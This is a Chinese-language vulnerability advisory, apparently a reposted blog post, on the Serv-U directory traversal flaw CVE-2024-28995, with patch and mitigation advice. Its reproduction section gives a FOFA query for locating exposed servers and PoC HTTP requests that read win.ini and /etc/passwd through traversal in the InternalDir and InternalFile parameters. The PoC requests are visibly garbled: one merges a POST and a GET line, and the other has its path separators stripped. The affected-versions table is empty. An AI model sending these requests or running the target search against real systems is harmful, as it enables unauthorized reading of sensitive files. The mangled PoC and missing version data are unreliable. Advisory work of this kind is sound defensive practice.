SolarWinds Serv-U 目录遍历漏洞(CVE-2024-28995)
产品介绍
SolarWinds是一家提供广泛的IT管理和网络管理软件解决方案的公司,其产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等,Serv-U是SolarWinds提供的一款FTP(文件传输协议)服务器软件,它允许用户在Windows和Linux系统上设置和管理FTP服务,Serv-U提供了多种功能,以确保文件传输的安全性、效率和灵活性。
漏洞威胁
2024年6月,Serv-U官方SolarWinds发布了新补丁,修复了一处目录遍历致文件读取漏洞(CVE-2024-28995),经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致敏感信息泄露,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞。
漏洞成因
Serv-U的目录遍历漏洞(CVE-2024-28995)是由于在处理路径时缺乏适当的验证,攻击者可以通过传递包含"../"的路径段绕过路径验证,访问任意文件。
漏洞影响
该漏洞允许攻击者读取目标服务器上的任意文件,包括敏感配置和日志文件,漏洞的利用可能导致敏感数据泄露,甚至可能进一步利用其他漏洞进行更严重的攻击。
影响范围
产品 | 版本 |
SolarWinds Serv-U FTP Server | |
SolarWinds Serv-U Gateway | |
SolarWinds Serv-U MFT Server |
注意:Serv-U版本15.3.2及更早版本将于2025年2月终止使用,并且此版本以下的所有版本都已终止使用并且不再受支持。
漏洞环境
FOFA: server="Serv-U"
漏洞复现
1、Windows-PoC
POST /formservice?service=u GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
2、Linux-PoC
GET /?InternalDir=........etc&InternalFile=passwd HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
批量脚本验证
Nuclei验证脚本已发布。
修复建议
1、升级修复方案
SolarWinds已发布15.4.2 Hotfix 2修复漏洞,强烈建议所有受影响的Serv-U版本升级到15.4.2.157版本或更高版本,最新版本可在SolarWinds官方网站下载。
2、临时缓解方案
确认和限制受影响的HTTP请求参数:将所有传入的InternalDir和InternalFile参数进行严格的路径验证,确保不包含任何目录遍历字符序列(如../或..)。
应用文件系统权限限制:在操作系统层面,限制Serv-U进程对敏感文件和目录的访问权限,确保即使通过漏洞进行路径遍历,也无法读取到敏感文件。
如非必要,不要将Serv-U FTP服务开放在公网上。
小伙伴们,上文介绍serv u 漏洞的内容,你了解清楚吗?希望对你有所帮助,任何问题可以给我留言,让我们下期再见吧。
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/88187.html